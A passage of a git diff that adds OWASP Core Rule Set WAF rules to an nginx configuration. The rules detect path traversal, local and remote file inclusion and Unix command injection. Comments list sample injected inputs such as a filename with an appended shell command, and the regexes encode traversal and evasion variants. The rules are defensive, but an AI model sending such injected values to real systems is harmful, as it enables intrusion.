tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule TX:1 "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v 
-\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \ + "t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used (see: https://www.rfc-editor.org/rfc/rfc7578#section-4.7) +# Note: this is in phase:2 because these are headers that come in the body +SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \ + "id:922120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used',\ + logdata:'Matched Data: %{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-deprecated-header',\ + tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/nginx/config/owasp-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/nginx/config/owasp-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf new file mode 100644 index 00000000..097e7f54 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf 
@@ -0,0 +1,203 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# +# -=[ Directory Traversal Attacks ]=- +# +# Ref: https://github.com/wireghoul/dotdotpwn +# +# [ Encoded /../ Payloads ] +# +# Regular expression generated from regex-assembly/930100.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 930100 +# +SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?i)(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[5-6]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))(?:\.(?:%0[0-1]|\?)?|\?\.?|%(?:2(?:(?:5(?:2|c0%25a))?e|%45)|c0(?:\.|%[25-6ae-f]e)|u(?:(?:ff0|002)e|2024)|%32(?:%(?:%6|4)5|E)|(?:e|f(?:(?:8|c%80)%8)?0%8)0%80%ae)|0x2e){2,3}(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[5-6]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))" \ + "id:930100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Path Traversal Attack (/../) or (/.../)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" + +# +# [ Decoded /../ or /..;/ Payloads ] +# +# To prevent '..' from triggering, the regexp is split into two parts: +# - ../ +# - /.. +# OR +# - .../ +# - /... 
+# +# Semicolon added to prevent path traversal via reverse proxy mapping '/..;/' (Tomcat) +# +SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?:(?:^|[\x5c/;])\.{2,3}[\x5c/;]|[\x5c/;]\.{2,3}(?:[\x5c/;]|$))" \ + "id:930110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\ + msg:'Path Traversal Attack (/../) or (/.../)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" + +# +# -=[ OS File Access ]=- +# +# We check for OS file access with the help of a local file with OS files data. +# +# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml +# +# If you wonder where support for Google OAuth2 has gone, see: +# https://github.com/coreruleset/google-oauth2-plugin +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \ + "id:930120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ + msg:'OS File Access Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# -=[ Restricted File Access ]=- +# +# Detects attempts to retrieve application 
source code, metadata, +# credentials and version control history possibly reachable in a web root. +# +SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ + "id:930130,\ + phase:1,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ + msg:'Restricted File Access Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# +# -=[ OS File Access ]=- +# +# This is a stricter sibling of rule 930120. +# This stricter sibling checks for OS file data in request headers referer and user-agent. +# We check for OS file access with the help of a local file with OS files data. 
+# +# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml +# +SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-files.data" \ + "id:930121,\ + phase:1,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\ + msg:'OS File Access Attempt in REQUEST_HEADERS',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-lfi',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/126',\ + tag:'PCI/6.5.4',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +# +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI" diff --git a/nginx/config/owasp-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/nginx/config/owasp-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf new file mode 100644 index 00000000..80d77d22 --- /dev/null +++ b/nginx/config/owasp-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf 
@@ -0,0 +1,189 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ +# +# RFI Attacks +# + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) +# + +# -=[ Rule Logic ]=- +# These rules look for common types of Remote File Inclusion (RFI) attack methods. +# - URL Contains an IP Address +# - The PHP "include()" Function +# - RFI Data Ends with Question Mark(s) (?) 
+# - RFI Host Doesn't Match Local Host +# +# -=[ References ]=- +# http://projects.webappsec.org/Remote-File-Inclusion +# http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html +# +SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ + "id:931100,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?)://" \ + "id:931110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ + "id:931120,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)',\ + logdata:'Matched Data: 
%{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# url:file:// can be used by Java applications using +# org.apache.commons.io.IOUtils to access internal files, so this has been added +# +# This rule has one (stricter) sibling: 931131. +# That rule applies the same regular expression to the request filename in phase 1. +# +# Regular expression generated from regex-assembly/931130.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 931130 +# +SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ + "id:931130,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ + chain" + SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ + "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This is a (stricter) sibling of 931130. +# +# Regular expression generated from regex-assembly/931131.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 931131 +# +SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|itcoin|lob)|c(?:a(?:llto|p)|id|vs|ompress.(?:zlib|bzip2))|d(?:a(?:v|ta)|ict|n(?:s|tp))|e(?:d2k|xpect)|f(?:(?:ee)?d|i(?:le|nger|sh)|tps?)|g(?:it|o(?:pher)?|lob)|h(?:323|ttps?)|i(?:ax|cap|(?:ma|p)ps?|rc[6s]?)|ja(?:bbe)?r|l(?:dap[is]?|ocal_file)|m(?:a(?:ilto|ven)|ms|umble)|n(?:e(?:tdoc|ws)|fs|ntps?)|ogg|p(?:aparazzi|h(?:ar|p)|op(?:2|3s?)|r(?:es|oxy)|syc)|r(?:mi|sync|tm(?:f?p)?|ar)|s(?:3|ftp|ips?|m(?:[bs]|tps?)|n(?:ews|mp)|sh(?:2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?)?|vn(?:\+ssh)?)|t(?:e(?:amspeak|lnet)|ftp|urns?)|u(?:dp|nreal|t2004)|v(?:entrilo|iew-source|nc)|w(?:ebcal|ss?)|x(?:mpp|ri)|zip)://(?:[^@]+@)?([^/]*)" \ + "id:931131,\ + phase:1,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rfi',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/175/253',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ + chain" + SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ + "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 
or higher)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+#
+# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI"
diff --git a/nginx/config/owasp-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/nginx/config/owasp-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
new file mode 100644
index 00000000..ee56abe1
--- /dev/null
+++ b/nginx/config/owasp-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
@@ -0,0 +1,1826 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
+#
+
+
+# [ Unix command injection ]
+#
+# This rule detects Unix command injections.
+# A command injection takes a form such as:
+#
+# foo.jpg;uname -a
+# foo.jpg||uname -a
+#
+# The vulnerability exists when an application executes a shell command
+# without proper input escaping/validation.
+#
+# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
+# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
+#
+# To prevent false positives, we look for a 'starting sequence' that
+# precedes a command in shell syntax, such as: ; | & $( ` <( >(
+# Anatomy of the regexp with examples of patterns caught:
+#
+# 1. Starting tokens
+#
+# ; ;ifconfig
+# \{ {ifconfig}
+# \| |ifconfig
+# \|\| ||ifconfig
+# & &ifconfig
+# && &&ifconfig
+# \n ;\nifconfig
+# \r ;\rifconfig
+# \$\( $(ifconfig)
+# \$\(\( $((ifconfig))
+# ` `ifconfig`
+# \${ ${ifconfig}
+# <\( <( ifconfig )
+# >\( >( ifconfig )
+# \(\s*\) a() ( ifconfig; ); a
+#
+# 2.
Command prefixes
+#
+# { { ifconfig }
+# \s*\(\s* ( ifconfig )
+# \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ VARNAME=xyz ifconfig
+# !\s* ! ifconfig
+# \$ $ifconfig
+#
+# 3. Quoting
+#
+# ' 'ifconfig'
+# \" "ifconfig"
+#
+# 4. Paths
+#
+# [\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/ /sbin/ifconfig, /s?in/./ifconfig, /s[a-b]in/ifconfig etc.
+#
+# An effort was made to combat evasions by shell quoting (e.g. 'ls',
+# 'l'"s", \l\s are all valid). ModSecurity has a t:cmdLine
+# transformation built-in to deal with this, but unfortunately, it
+# replaces ';' characters and lowercases the payload, which is less
+# useful for this case. However, emulating the transformation makes
+# the regexp more complex.
+#
+# This is the base Rule to prevent Unix Command Injection
+# for prefix + two and three characters.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded
words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932230.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932230 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&